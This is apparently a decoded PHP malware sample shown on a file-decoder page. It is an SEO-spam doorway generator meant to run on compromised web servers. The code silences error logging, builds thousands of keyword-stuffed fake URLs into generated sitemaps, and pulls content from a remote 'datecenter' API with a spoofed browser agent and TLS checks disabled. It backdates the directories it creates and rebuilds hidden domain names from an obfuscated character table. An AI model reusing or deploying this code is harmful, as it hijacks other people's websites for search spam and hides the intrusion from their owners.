	$put_str = ''; 
	$urlsArray = $filenames;	//print_r($urlsArray); 
	$numLinks = count($urlsArray);	 
	foreach($urlsArray as $value){ 
		$curphp=basename(__FILE__); 
		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		//print_r( $value.$curphp."  ".$first."  ".$last);		if($first===false && $last===false && $checkTxt===false) 
		{ 
			 
			$url=$serpath ."/". $filePres . PRENAME . '-' . basename($value) .$fileEnds;			$put_str .= $url . PHP_EOL;				 
		} 
	} 
		$gFile = 'urls.txt';		echo '<br/>'.$gFile.''; 
		@unlink($gFile);		file_put_contents($gFile,$put_str);		echo "<br/>";	 
} 
//sitemap.xml4000xml$c=1sitemap$c=2 
//$dir 
 
 
function print_map2($filenames,$c=1,$jdt=1){ 
 
	$filePres = '';	$fileEnds = '';	 
	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			 
	if(JDT == 2){ 
		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){ 
		$filePres = $httcReplace . "/";	}elseif(JDT == 3){ 
		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{ 
		$filePres = '';	} 
	if(JDT == 3){ 
		$fileEnds = '';	}else{ 
		$fileEnds = JTHZ;	} 
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/')); 
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		 
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>'; 
	// $urlsArray = $filenames; 
	// $numLinks = count($urlsArray); 
	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s"); 
	$str = "";						 
	$tempArr1 = $filenames; 
	 
	foreach($tempArr1 as $value2){ 
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		$tempPid = $value; 
				$url = getalink($tempPid); 
		 
		 
		 
		if($first===false && $last===false && $checkTxt===false) 
		{ 
			$date = date("Y-m-d");			$time = date("H:i:s");				 
		 
			if($star % 12000==11999){ 
				$put_str = $mapPre . $str . $mapEnd; 
				header("Content-type: text/xml"); 
				echo $put_str; 
				return;		 
			} 
			 
		 
			 
	 
			$str .= "   <url> 
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url> 
		";	 
			 
			 
			$star++;			$starPri++;		} 
	} 
	 
	{ 
		 
		$put_str = $mapPre . $str . $mapEnd;		 
		header("Content-type: text/xml"); 
		echo $put_str; 
 
	} 
	 
	unset($tempArr1);	unset($filenames);	 
} 
 
function print_map($filenames,$c=1,$jdt=1){ 
	$filePres = '';	$fileEnds = '';	 
	 
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/')); 
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		 
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>'; 
	// $urlsArray = $filenames; 
	// $numLinks = count($urlsArray); 
	 
	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s"); 
	$str = "   <url> 
			 <loc>" . $siteLink . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
			 <changefreq>always</changefreq> 
			 <priority>1.0</priority> 
			 </url> 
		";						 
	$tempArr1 = $filenames; 
	 
	foreach($tempArr1 as $value2){ 
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		 
			$tempPid = $value; 
				$url = getalink($tempPid); 
		 
		 
		if($first===false && $last===false && $checkTxt===false) 
		{ 
			$date = date("Y-m-d");			$time = date("H:i:s");			 
	 
			if($star % 12000==11999){ 
				$put_str = $mapPre . $str . $mapEnd; 
				header("Content-type: text/xml"); 
				echo $put_str; 
				return;			 
			} 
			 
			if($starPri >= 400 && $priority != 0.1){ 
				$starPri = 0;				$priority = $priority - 0.1;			} 
			 
			if($priority > 0.1){ 
				 
				$str .= "   <url> 
					 <loc>" . $url . "</loc> 
					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
					 <changefreq>daily</changefreq> 
					 <priority>". $priority . "</priority> 
					 </url> 
				";	 
			}else{ 
										$str .= "   <url> 
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url> 
		";	 
			} 
			 
			$star++;			$starPri++;		} 
	} 
	 
	{ 
		 
		$put_str = $mapPre . $str . $mapEnd; 
		header("Content-type: text/xml");		 
		echo $put_str; 
 
	} 
	 
	unset($tempArr1);	unset($filenames);		 
} 
 
function gsitemap2($filenames,$c=1,$jdt=1){ 
	global $gnumber,$arrArrr; 
	$filePres = '';	$fileEnds = '';	 
	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			 
	if(JDT == 2){ 
		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){ 
		$filePres = $httcReplace . "/";	}elseif(JDT == 3){ 
		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{ 
		$filePres = '';	} 
	if(JDT == 3){ 
		$fileEnds = '';	}else{ 
		$fileEnds = JTHZ;	} 
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/')); 
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		 
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>'; 
	// $urlsArray = $filenames; 
	// $numLinks = count($urlsArray); 
	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s"); 
	$str = "";						 
	$tempArr1 = $filenames; 
	 
	foreach($tempArr1 as $value2){ 
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		 
			$tempPid = $value; 
				$url = getalink($tempPid); 
		 
		 
		 
		if($first===false && $last===false && $checkTxt===false) 
		{ 
			$date = date("Y-m-d");			$time = date("H:i:s");				 
		 
			if($star % 12000==11999){ 
				$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str); 
				$str = '';				$gnumber++;				return;			} 
			 
		 
			 
	 
			$str .= "   <url> 
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url> 
		";	 
			 
			 
			$star++;			$starPri++;		} 
	} 
	 
	{ 
		$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';		$gnumber++;		echo '<br/>'.$gFile.'<br/>'; 
		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	 
	} 
	 
	unset($tempArr1);	unset($filenames);	 
	echo "sitemap";	 
} 
function gsitemap($filenames,$c=1,$jdt=1){ 
	global $gnumber,$arrArrr;	 
	$filePres = '';	$fileEnds = '';	 
	 
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/')); 
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		 
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>'; 
	// $urlsArray = $filenames; 
	// $numLinks = count($urlsArray); 
	 
	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s"); 
	$str = "   <url> 
			 <loc>" . $siteLink . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
			 <changefreq>always</changefreq> 
			 <priority>1.0</priority> 
			 </url> 
		";						 
	$tempArr1 = $filenames; 
	 
	foreach($tempArr1 as $value2){ 
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");	 
		 
			$tempPid = $value; 
				$url = getalink($tempPid); 
		 
		if($first===false && $last===false && $checkTxt===false) 
		{ 
			$date = date("Y-m-d");			$time = date("H:i:s");			 
	 
			if($star % 12000==11999){ 
				$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				 
				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str); 
				$str = '';				$gnumber++;				return;				 
			} 
			 
			if($starPri >= 400 && $priority != 0.1){ 
				$starPri = 0;				$priority = $priority - 0.1;			} 
			 
			if($priority > 0.1){ 
				 
				$str .= "   <url> 
					 <loc>" . $url . "</loc> 
					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
					 <changefreq>daily</changefreq> 
					 <priority>". $priority . "</priority> 
					 </url> 
				";	 
			}else{ 
										$str .= "   <url> 
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url> 
		";	 
			} 
			 
			$star++;			$starPri++;		} 
	} 
	 
	{ 
		$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';		echo '<br/>'.$gFile.'<br/>';		 
		$gnumber++; 
		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	 
	} 
	 
	unset($tempArr1);	unset($filenames);	echo "sitemap";	 
} 
 
 
  
function fillUrl($str = '', $url){ 
	$relur = '#(?:href|src) ?= ?"([^"]+)"#s';	 
	$urlInfo = parse_url($url);	 
	 
	preg_match_all($relur, $str, $matches); 
	if(count($matches[1])){ 
		foreach($matches[1] as $values){ 
			if(!strstr($values, "//") && !strstr($values, "..")){ 
				$rStr = $urlInfo['host']."/".$values;				$rStr = 'http://' . str_replace('//','/',$rStr);				 
				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}elseif(strstr($values, "..")){ 
				 
				// echo $urlInfo['host'];				// echo str_replace(basename($url),"",$url);				// die();				 
				$rStr = str_replace(basename($url),"",$url)."/".$values;				 
				 
				$rStr = str_replace("http://","<llqhttp>",$rStr);				 
				$rStr = str_replace("https://","<llqhttps>",$rStr);				 
				$rStr = str_replace("//","/",$rStr);				 
				$rStr = str_replace("<llqhttps>","https://",$rStr);				 
				$rStr = str_replace("<llqhttp>","http://",$rStr);				 
				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			} 
		} 
	}	 
	 
	 
	$relur = '#(?:href|src) ?= ?\'([^\']+)\'#s';	 
	$urlInfo = parse_url($url);	 
	 
	preg_match_all($relur, $str, $matches);	 
	// print_r($matches[1]);	 
	if(count($matches[1])){ 
		foreach($matches[1] as $values){ 
			if(!strstr($values, "//") && !strstr($values, "..")){ 
					$rStr = $urlInfo['host']."/".$values;				$rStr = 'http://' . str_replace('//','/',$rStr);				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}elseif(strstr($values, "..")){ 
				 
				$rStr = str_replace(basename($url),"",$url)."/".$values;				 
				 
				$rStr = str_replace("http://","<llqhttp>",$rStr);				 
				$rStr = str_replace("https://","<llqhttps>",$rStr);				 
				$rStr = str_replace("//","/",$rStr);				 
				$rStr = str_replace("<llqhttps>","https://",$rStr);				 
				$rStr = str_replace("<llqhttp>","http://",$rStr);				 
				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			} 
		} 
	} 
	return $str;} 
function auto_read($str, $charset='UTF-8') { 
	$list = array('EUC-JP', 'Shift_JIS', 'UTF-8', 'iso-2022-jp'); 
	$encode = mb_detect_encoding($str, $list);	// echo $encode;die();	 
	if($encode == 'UTF-8'){ 
		return $str;	}else{ 
		return mb_convert_encoding($str, $charset, $encode);	} 
	 
} 
function detect_encoding($file){ 
	$list = array('GBK', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'ISO-8859-1');	$str = file_get_contents($file);	foreach ($list as $item) { 
		$tmp = mb_convert_encoding($str, $item, $item);		if (md5($tmp) == md5($str)) { 
		 
			return $item;		} 
	} 
	return null;} 
function curl_get_from_webpage($url,$proxy='',$loop=10){ 
	$data = false;    $i = 0;    while(!$data) { 
       $data = curl_get_from_webpage_one_time($url,$proxy);       if($i++ >= $loop) break;    } 
	return $data;} 
 
 
function curl_getjs_from_webpage($url,$time){ 
if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){ 
 
  $curl = curl_init();	//,. 
	$user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100";			 
	// $urlReferer = "http://www.google.com"; 
	curl_setopt($curl, CURLOPT_URL, $url);	 
		if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0,	CURLOPT_POSTFIELDS => '',			CURLOPT_RETURNTRANSFER => 1,CURLOPT_TIMEOUT => $time,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1,			CURLOPT_VERBOSE => 0 
			));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_TIMEOUT, $time);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent); 
	}$data=curl_exec($curl);curl_close($curl); 
 }else{ 
 
  $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; 
  if($is_auf){ 
		$data = file_get_contents($url); 
  } 
 
 } 
	if(!$data) return false; 
	return $data;	 
	 
} 
 
function curl_get_from_webpage_one_time($url,$proxy=''){ 
if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){ 
 
  $curl = curl_init();	//,. 
	$user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100";			 
	// $urlReferer = "http://www.google.com"; 
	if(strlen($proxy) > 8) curl_setopt($curl, CURLOPT_PROXY, $proxy); 
curl_setopt($curl, CURLOPT_URL, $url);	 
		if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0,	CURLOPT_POSTFIELDS => '',			CURLOPT_RETURNTRANSFER => 1,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1,			CURLOPT_VERBOSE => 0 
			));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent); 
	}$data=curl_exec($curl);curl_close($curl); 
 }else{ 
 
  $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; 
  if($is_auf){ 
		$data = file_get_contents($url); 
  } 
 
 } 
	if(!$data) return false; 
	return $data;	 
	 
} 
 
 
 
	 
// 
 
 
 
function my_mkdir($dir){ 
		global $fitime; 
		if(!is_dir($dir)){ 
			mkdir($dir); 
			@touch($dir, $fitime, $fitime);  
		} 
	} 
	 
 
	 
	function generate_dir_file($gDir=''){ 
		 
		global $hostDir; 
		$gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir); 
		$gDir = str_replace('\',DIRECTORY_SEPARATOR,$gDir); 
		$arr = explode(DIRECTORY_SEPARATOR,$gDir); 
		 
		if(count($arr) <= 0) return; 
		 
		if(!strstr($gDir,$hostDir)) 
			$dir = $hostDir; 
		else 
			$dir = ''; 
 
 
		for($i = 0 ; $i < count($arr)-1 ; $i++){ 
			$dir .= DIRECTORY_SEPARATOR . $arr[$i]; 
			my_mkdir($dir); 
		} 
		 
		return $dir; 
	} 
		 
	 
	function getalink($pid){ 
		 
		global $arrnametime,$arrKeywz,$arr_word,$strRand;		 
	 
		$filePres = '';		$fileEnds = '';		$siteLink='http://'.$_SERVER['HTTP_HOST']; 
		$dirNames = dirname(__FILE__);		$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));		 
		if(JDT == 2){ 
			$filePres = $siteLink ."/". $httcReplace . "/" . basename(__FILE__) . "/";		}elseif(JDT == 1){ 
			$filePres = $siteLink ."/". $httcReplace . "/";		}elseif(JDT == 3){ 
			$filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?keyword=";		}else{ 
			$filePres = $siteLink."/";		} 
		 
		$ms = $arrnametime[$pid % count($arrnametime)];		 
		 
		$keyNum = $arrKeywz[$pid % count($arrKeywz)];		 
		$keyWordKey = $pid % 10;		$keyStrKey = $pid % strlen("icedrkswzjhpnxoyvumfatblgq");		$keyArr = array();		$flag = 0;		 
		if($ms == 2 or $ms ==4){ 
			if($keyNum >= 9){ 
				$fg = 4;			}elseif($keyNum >= 7){ 
				 $fg = 3;			}else{ 
				 $fg = 2;			} 
		} 
		 
		for($i=0;$i<$keyNum;$i++){ 
			$tempNum = $arr_word[$i][$keyWordKey];			$tempstr = '';			for($j=0;$j<$tempNum;$j++) 
				$tempstr .= $strRand[$flag++]{$keyStrKey};			 
			$keyArr[$i] = $tempstr;		} 
		 
		$PidWz = $pid % $keyNum;		$linkCenter = ''; 
		 
		if(JDT == 3){ 
			for($i=0;$i<$keyNum;$i++){ 
				if($PidWz == $i && $i != 0) 
					$linkCenter .= '-'. BZPRO . $pid .'-';	 
				elseif($PidWz == $i) 
				  $linkCenter .= BZPRO . $pid .'-'; 
				 
				$linkCenter .= $keyArr[$i] .'';			 
			} 
			$linkCenter = $linkCenter . "#llq";		 
			$linkCenter = str_replace('-#llq','',$linkCenter);	 
			$linkCenter = str_replace('#llq','',$linkCenter); 
			$linkCenter = str_replace('--','-',$linkCenter);	 
			$linkCenter = str_replace('/-','/',$linkCenter);				 
			$rtStr = $filePres.$linkCenter; 
			$rtStr = str_replace($filePres.'-',$filePres,$rtStr); 
		 
			return $rtStr; 
			 
			} 
		 
		 
		 
		 
		if($ms == 1){ 
			for($i=0;$i<$keyNum;$i++){ 
				if($PidWz == $i && $i != 0) 
					$linkCenter .= '-'. BZPRO . $pid .'-';	 
				elseif($PidWz == $i) 
				  $linkCenter .= BZPRO . $pid .'-'; 
				 
				$linkCenter .= $keyArr[$i] .'';	 
			} 
			 
			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			 
		}elseif($ms == 2){ 
			for($i=0;$i<$keyNum;$i++){ 
				if($PidWz == $i && $i != 0) 
					$linkCenter .= '-'. BZPRO . $pid .'-';	 
				elseif($PidWz == $i) 
				  $linkCenter .= BZPRO . $pid .'-'; 
				 
				$linkCenter .= $keyArr[$i] .'';	 
				 
 
				if($i == $fg-1){ 
					// $linkCenter .= '/';				 
					$linkCenter .= '-';				 
				} 
			} 
			 
			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			 
		}elseif($ms == 3){ 
			for($i=0;$i<$keyNum;$i++){ 
				if($PidWz == $i && $i != 0) 
					$linkCenter .= '-'. BZPRO . $pid .'-';	 
				elseif($PidWz == $i) 
				  $linkCenter .= BZPRO . $pid .'-'; 
				 
				$linkCenter .= $keyArr[$i] .'';	 
			} 
			 
			$linkCenter .= JTHZ;			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);			 
			 
		}elseif($ms == 4){ 
				for($i=0;$i<$keyNum;$i++){ 
				if($PidWz == $i && $i != 0) 
					$linkCenter .= '-'. BZPRO . $pid .'-';	 
				elseif($PidWz == $i) 
				  $linkCenter .= BZPRO . $pid .'-'; 
				 
				$linkCenter .= $keyArr[$i] .'';	 
 
				if($i == $fg-1){ 
				// $linkCenter .= '/';				 
					$linkCenter .= '-';			 
					} 
			} 
			 
			$linkCenter .= JTHZ;			$linkCenter = str_replace("-/","/",$linkCenter);			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);		} 
		 
			$linkCenter = str_replace('--','-',$linkCenter);	 
			$linkCenter = str_replace('/-','/',$linkCenter);	 
			 
		$rtStr = $filePres.$linkCenter; 
		$rtStr = str_replace($filePres.'-',$filePres,$rtStr); 
		 
		return $rtStr; 
	} 
	 
	 
	function rmhtmltag($tagname='',$str=''){ 
		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#s'; 
		$str = preg_replace($rulers,'',$str); 
		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#i'; 
		$str = preg_replace($rulers,'',$str); 
		return $str; 
	 
	} 
  
  
 function rmhtmltag2($tagname='',$str=''){ 
		$rulers = '#<'.$tagname.'[^>]*>#s'; 
		$str = preg_replace($rulers,'',$str); 
		$rulers = '#</'.$tagname.'>#s'; 
		$str = preg_replace($rulers,'',$str); 
	 
	$rulers = '#<'.$tagname.'[^>]*>#i'; 
	$str = preg_replace($rulers,'',$str); 
	$rulers = '#</'.$tagname.'>#i'; 
	$str = preg_replace($rulers,'',$str); 
	return $str; 
	 
	} 
	 
	 
	 
// 
 
	 
	 
function is_ip($localIp,$ipRanges) 
{   
	$localIp = ip2long($localIp);  
	foreach($ipRanges as $val) 
	{ 
		$ipmin=sprintf("%u",ip2long($val[0]));		$ipmax=sprintf("%u",ip2long($val[1])); 
		if($localIp >= $ipmin && $localIp <= $ipmax) 
		{  
			return true; 
		} 
	}  
	return false;} 
 
function RandAbcs($length = ""){ 
  $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_./:-"; 
  return ($str); 
} 
 
 
 
function getarr(){ 
		global $O00O0O; 
		$arr[0]=$O00O0O{6}.$O00O0O{8}.$O00O0O{13}.$O00O0O{6}.$O00O0O{11}.$O00O0O{4}.$O00O0O{3}.$O00O0O{0}.$O00O0O{19}.$O00O0O{0}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[1]=$O00O0O{12}.$O00O0O{8}.$O00O0O{11}.$O00O0O{21}.$O00O0O{0}.$O00O0O{8}.$O00O0O{2}.$O00O0O{4}.$O00O0O{13}.$O00O0O{19}.$O00O0O{4}.$O00O0O{17}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[2]=$O00O0O{13}.$O00O0O{14}.$O00O0O{21}.$O00O0O{4}.$O00O0O{23}.$O00O0O{14}.$O00O0O{18}.$O00O0O{14}.$O00O0O{20}.$O00O0O{17}.$O00O0O{4}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[3]=$O00O0O{19}.$O00O0O{20}.$O00O0O{18}.$O00O0O{8}.$O00O0O{12}.$O00O0O{4}.$O00O0O{3}.$O00O0O{8}.$O00O0O{6}.$O00O0O{8}.$O00O0O{19}.$O00O0O{0}.$O00O0O{11}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[4]=$O00O0O{17}.$O00O0O{14}.$O00O0O{2}.$O00O0O{0}.$O00O0O{13}.$O00O0O{0}.$O00O0O{19}.$O00O0O{17}.$O00O0O{0}.$O00O0O{13}.$O00O0O{18}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25}; 
	return $arr; 
} 
	 
function getthisdom(){ 
	$myArrs = getarr(); 
  return 'http://www.'.$myArrs[CENTERKEY].MYDIR; 
} 
 
 
 
function get_real_ip(){ 
	 
	$ip=false;	if(!empty($_SERVER["HTTP_CLIENT_IP"])){ 
		$ip = $_SERVER["HTTP_CLIENT_IP"];	} 
	 
	if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
		$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);		if ($ip) { array_unshift($ips, $ip); $ip = FALSE; } 
		 
		for ($i = 0; $i < count($ips); $i++) { 
			if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) { 
				$ip = $ips[$i];				break;			} 
		} 
	} 
	 
	return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);} 
 
//file end 
 ?>

Did this file decode correctly?

Original Code

<?php 
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@set_time_limit(3600);
define("DOMTXT","/jd1/");
define("GETDATE","http://www.datecenter.com/api/?key=");
define("CENTERKEY",2);
define("MYDIR", "/ebayuk20190325-8/");
define("FNUM",42);
define("JGNUM","40");
define("LINKNUM","8");
define("BZSITE","x");
define("BZPRO","a");
//msbg
define("JDT","3");
//msend

//msidbg
define("MSID",841);
//mssidend


//jthouzuibg
define("JTHZ","/");
//jthouzuiend


// #llqllq#arr_nametimebg

$arrnametime[]="2";
$arrnametime[]="3";
$arrnametime[]="4";
$arrnametime[]="1";


// #llqllq#arr_nametimeend

// #llqllq#arr_wordbg

$arr_word[0][] ="2";$arr_word[0][] ="3";$arr_word[0][] ="4";$arr_word[0][] ="3";$arr_word[0][] ="3";$arr_word[0][] ="4";$arr_word[0][] ="4";$arr_word[0][] ="2";$arr_word[0][] ="2";$arr_word[0][] ="3";$arr_word[1][] ="3";$arr_word[1][] ="4";$arr_word[1][] ="2";$arr_word[1][] ="3";$arr_word[1][] ="4";$arr_word[1][] ="3";$arr_word[1][] ="2";$arr_word[1][] ="4";$arr_word[1][] ="2";$arr_word[1][] ="3";$arr_word[2][] ="3";$arr_word[2][] ="3";$arr_word[2][] ="4";$arr_word[2][] ="3";$arr_word[2][] ="2";$arr_word[2][] ="3";$arr_word[2][] ="2";$arr_word[2][] ="4";$arr_word[2][] ="4";$arr_word[2][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="2";$arr_word[3][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="3";$arr_word[3][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="3";$arr_word[3][] ="3";$arr_word[3][] ="3";$arr_word[4][] ="4";$arr_word[4][] ="2";$arr_word[4][] ="3";$arr_word[4][] ="3";$arr_word[4][] ="3";$arr_word[4][] ="2";$arr_word[4][] ="3";$arr_word[4][] ="4";$arr_word[4][] ="2";$arr_word[4][] ="4";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="2";$arr_word[5][] ="2";$arr_word[5][] ="3";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="2";$arr_word[6][] ="4";$arr_word[6][] ="2";$arr_word[6][] ="4";$arr_word[6][] ="3";$arr_word[6][] ="4";$arr_word[6][] ="3";$arr_word[6][] ="2";$arr_word[6][] ="3";$arr_word[6][] ="3";$arr_word[6][] ="2";$arr_word[7][] ="3";$arr_word[7][] ="4";$arr_word[7][] ="3";$arr_word[7][] ="2";$arr_word[7][] ="4";$arr_word[7][] ="3";$arr_word[7][] ="3";$arr_word[7][] ="2";$arr_word[7][] ="2";$arr_word[7][] ="4";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="4";$arr_word[8][] ="4";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="4";$arr_word[8][] ="3";$arr_word[9][] ="2";$arr_word[9][] ="4";$arr_word[9][] ="3";$arr_word[9][] ="2";$arr_word[9][] ="4";$arr_word[9][] ="3";$arr_word[9][] ="3";$arr_word[9][] ="4";$arr_word[9][] ="2";$arr_word[9][] ="3";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="4";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="4";$arr_word[10][] ="4";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="3";$arr_word[11][] ="2";$arr_word[11][] ="2";$arr_word[11][] ="3";$arr_word[11][] ="3";$arr_word[11][] ="4";$arr_word[11][] ="4";$arr_word[11][] ="4";$arr_word[11][] ="2";$arr_word[11][] ="3";$arr_word[11][] ="3";

// #llqllq#arr_wordend


// #llqllq#arr_keywz

$arrKeywz[]="5";
$arrKeywz[]="4";
$arrKeywz[]="10";
$arrKeywz[]="11";
$arrKeywz[]="7";
$arrKeywz[]="6";
$arrKeywz[]="9";
$arrKeywz[]="8";
$arrKeywz[]="12";


// #llqllq#arr_keywzend
// #llqllq#arr_fuhao

$arrfh[]="Christmas gift ideas 2018";
$arrfh[]="Holiday presents";
$arrfh[]="Christmas gift store";
$arrfh[]="Christmas Holiday";
